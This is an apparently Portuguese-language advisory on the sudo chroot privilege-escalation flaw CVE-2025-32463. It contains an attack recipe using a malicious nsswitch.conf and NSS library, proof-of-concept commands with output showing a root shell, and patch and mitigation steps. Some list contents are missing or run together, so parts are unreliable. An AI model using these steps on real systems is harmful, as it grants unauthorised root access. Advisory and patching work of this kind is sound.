
CVE-2025-32463

Escalação Crítica de Privilégio Local no Gerenciador de Privilégios Linux Mais Usado
Qualquer usuário local (mesmo sem permissões sudoers) poderia se tornar root em segundos usando sudo -R
CVE-2025-32463 (também conhecido como "chroot-to-root") é uma vulnerabilidade crítica de escalação local de privilégio no sudo.
Ela permite que qualquer usuário local sem privilégios — mesmo aqueles não listados no sudoers — obtenha acesso root completo simplesmente usando a opção -R / --chroot.
A falha foi introduzida no sudo 1.9.14 (junho de 2023) e existiu até 1.9.17p1 (junho de 2025). Não foi um bug tradicional, mas um efeito colateral perigoso de como o sudo lidava com a resolução de caminhos dentro de um chroot controlado pelo usuário antes das verificações de política.
Aviso Oficial do Sudo: "Um atacante pode aproveitar a opção
-Rdo sudo para executar comandos arbitrários como root, mesmo que não esteja listado no arquivo sudoers."
Verificação da Realidade:
O bug originou-se de uma alteração de 2023 na lógica de correspondência de comandos do sudo:
-R /caminho é usado, o sudo chama pivot_root() antes de avaliar completamente a política do sudoers./etc/nsswitch.conf de dentro do chroot./etc/nsswitch.conf malicioso (ex.: passwd: /woot1337)libnss_/woot1337.so.2 contendo um construtor que é executado como root.Insight Chave: A opção -R era permitida mesmo para usuários sem permissões sudo, tornando-a um vetor de ataque perfeito.
Apenas sudo 1.9.14 até 1.9.17 (antes de 1.9.17p1)
Amplamente Afetados:
NÃO afetados:
Exploit de uma linha (da Stratascale CRU):
# 1 – clonar repositório
$ git clone https://github.com/zaryouhashraf/CVE-2025-32463
$ cd CVE-2025-32463
# 2 – construir e executar imagem Docker (marcada como "sudo-chwoot")
$ sudo chmod +x CVE-2025-32463.sh
$ ./CVE-2025-32463.sh
# 3 – executar exploit no contêiner (executa comando root diretamente ou te leva a um shell root)
┌──(kali㉿kali)-[~]
└─$ ./CVE-2025-32463.sh
═══════════════════════════════════════════════════════════════
⚠ AVISO: PoC DO EXPLOIT CVE-2025-32463 ⚠
═══════════════════════════════════════════════════════════════
Este script é apenas para TESTES AUTORIZADOS em sistemas que você possui.
Executá-lo em sistemas não autorizados é ILEGAL.
Corrija imediatamente após o teste (sudo 1.9.17p1+).
[+] Criando estágio de exploit temporário...
[+] Compilando biblioteca NSS maliciosa...
[+] Acionando sudo -R ... (aguarde shell root)
(Se bem-sucedido, você será levado a um prompt bash root)
[!] CVE-2025-32463 acionado - obtendo root...
[+] Você agora é root!
┌──(root㉿kali)-[/]
└─# whoami
root
sudo -V | head -n 1
✅ Seguro se 1.9.17p1 ou mais novo (ou ≤ 1.9.13)
Debian/Ubuntu:
sudo apt update && sudo apt install --reinstall sudo
Fedora/RHEL:
sudo dnf update sudo
Arch:
sudo pacman -S sudo
Adicione ao /etc/sudoers (ou a um arquivo em /etc/sudoers.d/):
Defaults !use_chroot
Pesquise e remova quaisquer linhas CHROOT= ou runchroot=.
Dica Profissional de 2026: Verifique imagens Docker antigas, runners de CI e VMs legadas — muitas ainda contêm snapshots vulneráveis do sudo.
--chroot) podem se tornar superfície de ataque se não forem isoladas.Este incidente reforçou a necessidade do princípio do menor privilégio mesmo em ferramentas centrais do sistema.
Status em março de 2026: ✅ Completamente mitigado em todos os sistemas modernos • Funcionalidade Chroot depreciada • Ecossistema mais seguro
Feito com ❤️ para administradores Linux que corrigiram antes do KEV atingir
| Data | Evento |
|---|
| Junho de 2023 | sudo 1.9.14 lançado (bug introduzido) |
| 1º de abril de 2025 | Rich Mirch reporta em particular |
| 8 de abril de 2025 | CVE-2025-32463 atribuído |
| 9 de junho de 2025 | Correção proposta |
| 30 de junho de 2025 | Divulgação pública + blog Stratascale + PoC completo |
| Julho de 2025 | sudo 1.9.17p1 lançado; principais distribuições lançam atualizações |
| 29 de setembro de 2025 | Adicionado ao catálogo CISA KEV |
| 2026 | Funcionalidade Chroot completamente depreciada em todo o ecossistema |